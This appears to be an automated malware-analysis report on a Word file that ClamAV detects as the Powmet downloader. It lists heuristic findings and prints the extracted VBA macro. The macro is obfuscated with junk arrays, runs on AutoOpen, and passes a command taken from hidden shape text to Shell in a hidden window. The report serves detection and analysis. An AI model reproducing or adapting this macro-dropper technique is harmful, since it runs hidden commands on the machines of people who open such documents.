MALICIOUS
210
Risk Score
Heuristics 7
-
ClamAV: Doc.Downloader.Powmet-6826351-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Powmet-6826351-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
"K", "qG", "ZR", "aa", "zm", "X", "wt", "D") Shell AShHtwG + hPYvpQ + XBZLnkvK, 0 mwKimhEzt = Array("w", "Q", "N", "zv", "dn", "kN", "zj", "I", _ -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Function Sub AutoOpen() qihpjSqW = Array("u", "tZ", "O", "fH", "JY", "SP", "F", "o", _ -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8635 bytes |
SHA-256: a600433f5b6ad1ec768bc41f65d57f5f86c2b932020881c21a7ee7d7ddd18b48 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "RQwaMrXj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function REwEEEmUrEu()
CXphA = Array("h", "M", "SL", "dZ", "d", "mo", "F", "kD", _
"K", "j", "u", "BW", "bi", "t", "a", "O", _
"s", "R", "hB", "P", "fB", "dE", "dF", "W", _
"D", "KH", "w", "Qj", "N", "qn", "iE", "f", _
"Fi", "V", "i", "dj", "Q", "n", "D", "O", _
"w", "Sl", "aR", "H", "Mz", "r", "rA", "Z", _
"lW", "Fj", "A", "B", "ka", "u", "v", "U", _
"aE", "X", "Q", "rY", "w", "i", "ZY", "j")
HDJtJ = Array("kc", "E", "Y", "kQ", "uz", "zU", "OG", "q", _
"N", "rh", "wR", "l", "f", "jr", "H", "d", _
"ha", "m", "AA", "i", "o", "X", "X", "B", _
"W", "Z", "ji", "O", "O", "F", "Ed", "J", _
"qn", "h", "fj", "wM", "a", "U", "i", "HY", _
"t", "OV", "lK", "ak", "z", "n", "NR", "Wt", _
"ph", "F", "Dn", "ER", "w", "q", "Zl", "NV", _
"Q", "n", "R", "o", "Qw", "fH", "L", "Q")
AShHtwG = "" + ZJJYFm + atdfczk + Shapes("zjBmDlruUW").TextFrame.ContainingRange + rpvYcrFZ + qWrMBPd
zZQWXwdI = Array("Wd", "Sh", "kn", "ui", "p", "UP", "o", "U", _
"uw", "Bd", "G", "Ba", "iS", "U", "Yf", "Gk", _
"r", "aH", "vH", "IM", "mc", "jR", "X", "zb", _
"l", "Xc", "f", "I", "N", "U", "K", "WZ", _
"f", "S", "qf", "nz", "c", "b", "wX", "wj", _
"u", "wz", "ah", "b", "r", "zT", "X", "B", _
"sz", "f", "jC", "VV", "Mb", "KQ", "G", "v", _
"z", "L", "Pu", "H", "a", "w", "r", "h")
qszkfqXh = Array("J", "q", "wB", "q", "I", "k", "rI", "js", _
"lt", "Fl", "YV", "MD", "h", "B", "i", "lP", _
"zu", "qz", "u", "o", "ww", "wO", "BF", "Z", _
"Ci", "r", "Tv", "d", "z", "jm", "sO", "Zi", _
"I", "H", "p", "n", "cn", "pS", "QQ", "Si", _
"cL", "wU", "K", "q", "Rj", "Lt", "K", "p", _
"Io", "N", "o", "o", "bP", "q", "sz", "Iw", _
"KX", "pW", "t", "D", "G", "dk", "nK", "h")
ubqwM = Array("Sp", "r", "dj", "Y", "z", "O", "D", "qH", _
"Gw", "WA", "WI", "du", "Vq", "K", "hd", "Hf", _
"h", "n", "LW", "u", "iR", "z", "TY", "Z", _
"t", "iR", "SN", "V", "M", "W", "lK", "N", _
"Ll", "iJ", "D", "Ek", "J", "Rm", "bC", "Ih", _
"Ri", "YR", "fL", "E", "I", "k", "A", "F", _
"hJ", "H", "i", "ko", "I", "EK", "T", "G", _
"uI", "s", "K", "VC", "b", "hk", "zo", "aT")
PMloK = Array("Po", "V", "Xa", "k", "AH", "uO", "k", "iw", _
"Y", "O", "O", "iT", "tJ", "M", "c", "N", _
"Qj", "Rh", "uI", "oE", "GJ", "K", "Rr", "h", _
"vo", "u", "hi", "mv", "k", "S", "Go", "a", _
"G", "PF", "zN", "P", "X", "N", "kl", "m", _
"M", "z", "I", "V", "tR", "cX", "b", "F", _
"w", "r", "j", "b", "J", "d", "Hs", "R", _
"j", "n", "A", "E", "k", "hA", "lL", "MP")
kVTQpLhFQ = Array("p", "i", "M", "n", "M", "vQ", "Y", "z", _
"nK", "J", "F", "FG", "W", "SF", "G", "PH", _
"Cs", "LK", "MB", "E", "Js", "tu", "G", "IB", _
"G", "Qa", "np", "c", "A", "Z", "fv", "Ks", _
"mB", "Nj", "LM", "if", "nv", "zu", "BY", "I", _
"mI", "Kz", "O", "Y", "Y", "E", "C", "Kc", _
"Nu", "BU", "Ii", "P", "U", "d", "nE", "YM", _
"ia", "j", "a", "ps", "qw", "uj", "H", "h")
pAZQU = Array("Gj", "d", "zB", "IG", "p", "MC", "AV", "C", _
"P", "Sw", "C", "Os", "TN", "JQ", "Mf", "n", _
"kE", "f", "jB", "zE", "RR", "Al", "dw", "L", _
"X", "bs", "l", "op", "P", "ii", "R", "S", _
"Ts", "cv", "TP", "j", "E", "YU", "WE", "j", _
"w", "P", "C", "MW", "OH", "Ir", "u", "j", _
"k", "p", "n", "j", "J", "iN", "l", "Xh", _
"K", "qG", "ZR", "aa", "zm", "X", "wt", "D")
Shell AShHtwG + hPYvpQ + XBZLnkvK, 0
mwKimhEzt = Array("w", "Q", "N", "zv", "dn", "kN", "zj", "I", _
"N", "UD", "UV", "z", "W", "JC", "M", "Z", _
"Jb", "qt", "G", "z", "oB", "rf", "Vl", "i", _
"Zp", "YG", "Vi", "V", "HJ", "lX", "az", "IY", _
"K", "W", "i", "j", "Cv", "j", "uS", "Pl", _
"la", "t", "st", "k", "N", "kB", "kW", "jr", _
"fu", "MH", "z", "Sn", "Af", "oD", "j", "k", _
"wQ", "CR", "KJ", "Dj", "BG", "ch", "du", "RX")
uockcif = Array("n", "d", "E", "k", "zc", "S", "pj", "UT", _
"F", "CE", "lN", "Fj", "kl", "Xt", "pV", "S", _
"I", "Q", "mj", "E", "PI", "aP", "Am", "qU", _
"tW", "bb", "w", "sz", "q", "jc", "Gw", "iA", _
"Lb", "Q", "I", "Cp", "z", "OD", "J", "P", _
"P", "Q", "jo", "IM", "hN", "iD", "R", "K", _
"n", "pJ", "sw", "Z", "z", "NU", "nu", "bc", _
"A", "WI", "H", "K", "Gt", "C", "T", "H")
RtQGRTioQ = Array("ZJ", "Nn", "Kf", "Fh", "hX", "AY", "Wd", "mw", _
"a", "S", "V", "F", "d", "iZ", "BW", "Qc", _
"sM", "Ls", "Qu", "Rm", "mL", "m", "JA", "Q", _
"NF", "tC", "W", "jN", "v", "w", "uZ", "Ec", _
"C", "Cr", "Z", "p", "PR", "sz", "Zz", "LX", _
"h", "d", "EW", "lj", "F", "aK", "j", "o", _
"Il", "w", "VN", "PU", "C", "ET", "S", "A", _
"D", "D", "uL", "So", "q", "oj", "T", "bi")
tGwGA = Array("A", "fF", "Wb", "iw", "v", "Wi", "lw", "YM", _
"o", "Wz", "L", "jo", "mw", "w", "K", "O", _
"Gw", "z", "j", "b", "U", "H", "wt", "jj", _
"FP", "z", "c", "k", "h", "b", "kj", "L", _
"z", "RF", "UM", "VL", "Xz", "aW", "Z", "wM", _
"N", "Gt", "sR", "r", "ih", "jZ", "im", "VG", _
"lh", "zA", "a", "G", "E", "mV", "rj", "X", _
"TG", "Qt", "wK", "MN", "QQ", "Y", "o", "Ew")
End Function
Sub AutoOpen()
qihpjSqW = Array("u", "tZ", "O", "fH", "JY", "SP", "F", "o", _
"U", "j", "tr", "u", "VT", "wY", "Sw", "Bq", _
"N", "v", "I", "Q", "R", "LC", "u", "sM", _
"OF", "Cm", "f", "HY", "YU", "z", "HD", "Kl", _
"sb", "u", "c", "iD", "lG", "lN", "O", "q", _
"Cs", "s", "G", "Y", "nE", "u", "MS", "rP", _
"z", "UV", "OR", "i", "oP", "E", "AG", "o", _
"Y", "r", "W", "MH", "u", "X", "n", "ZX")
REwEEEmUrEu
RqaUVMSN = Array("WV", "N", "TK", "TZ", "t", "t", "t", "z", _
"ku", "E", "ON", "p", "iv", "Y", "Q", "HA", _
"nL", "Pz", "mO", "Na", "O", "dv", "R", "w", _
"KV", "k", "EV", "cc", "QW", "YB", "GO", "zL", _
"Di", "Rv", "z", "o", "w", "ps", "Tc", "f", _
"k", "ns", "Eu", "KE", "d", "tz", "z", "aK", _
"Jw", "X", "i", "J", "mL", "r", "Pr", "fq", _
"WI", "jV", "wv", "V", "qV", "bp", "V", "V")
aiDWoLFl = Array("w", "sO", "DN", "Kr", "r", "bH", "O", "S", _
"wc", "m", "SU", "uj", "QI", "N", "r", "Bf", _
"c", "bF", "bG", "LZ", "n", "JT", "Fd", "i", _
"Db", "Ej", "On", "W", "m", "Vw", "h", "qN", _
"jJ", "cM", "tc", "Of", "hZ", "j", "I", "sI", _
"Cv", "T", "XS", "i", "Us", "S", "bX", "UK", _
"Ib", "uw", "pj", "HV", "sH", "b", "HW", "M", _
"Ac", "El", "Zk", "Yz", "u", "L", "r", "ds")
moSAC = Array("iE", "L", "hA", "w", "GK", "z", "hj", "RB", _
"Eb", "j", "MY", "QK", "L", "i", "Lp", "AB", _
"J", "cj", "v", "F", "i", "AL", "cz", "jU", _
"ij", "B", "AR", "W", "DQ", "b", "zc", "jR", _
"f", "j", "K", "IA", "M", "j", "W", "Cb", _
"Nd", "iK", "SA", "id", "d", "D", "C", "t", _
"pF", "V", "h", "k", "ES", "BP", "n", "w", _
"F", "J", "d", "s", "zc", "T", "J", "uH")
zXclvB = Array("h", "zL", "LZ", "U", "t", "kd", "j", "h", _
"aX", "wv", "Rz", "U", "i", "bZ", "ld", "ou", _
"S", "jY", "Nq", "qX", "A", "fw", "BW", "M", _
"m", "T", "W", "j", "CV", "AD", "I", "X", _
"DJ", "dj", "nA", "vs", "NV", "Oj", "Q", "X", _
"G", "o", "K", "Xb", "dd", "PD", "Il", "SV", _
"n", "aI", "S", "Xz", "FW", "C", "p", "Un", _
"RF", "w", "Ff", "YZ", "zC", "SV", "t", "hh")
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.